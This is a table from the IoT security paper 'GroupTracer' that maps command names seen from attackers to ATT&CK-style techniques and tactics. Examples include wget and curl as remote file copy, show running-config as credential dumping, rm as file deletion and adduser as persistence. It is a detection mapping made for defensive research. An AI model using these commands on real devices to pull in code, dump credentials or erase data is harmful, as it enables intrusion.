Research Article
GroupTracer: Automatic Attacker TTP Profile Extraction and Group Cluster in Internet of Things
Table 1
Some examples of mapping from commands to TTP profiles.
| Command | Technique | Tactic |
| 1st knowledge base | show running-config | Credential dumping | Credential access | show startup-config | Credential dumping | Credential access |
| 2nd knowledge base | ftpget | Remote file copy | Lateral movement | wget | Remote file copy | Lateral movement | curl | Remote file copy | Lateral movement | rcp | Remote file copy | Lateral movement | copy | Remote file copy | Lateral movement | show archive config | Credentials in files | Credential access | show history | Input capture | Collection | show logging | Input capture | Collection | tar | Data compressed | Exfiltration | zip | Data compressed | Exfiltration | rar | Data compressed | Exfiltration | shutdown | System shutdown/reboot | Impact | reboot | System shutdown/reboot | Impact | del | File deletion | Defense evasion | rm | File deletion | Defense evasion | adduser | Create account | Persistence | usermod | Account manipulation | Persistence | groupadd | Account manipulation | Persistence | dir | File and directory discovery | Discovery | ls | File and directory discovery | Discovery | cd | File and directory discovery | Discovery | echo | Data from local system | Collection | cat | Data from local system | Collection | more | Data from local system | Collection | pwd | Data from local system | Collection | whoami | Data from local system | Collection |
|
|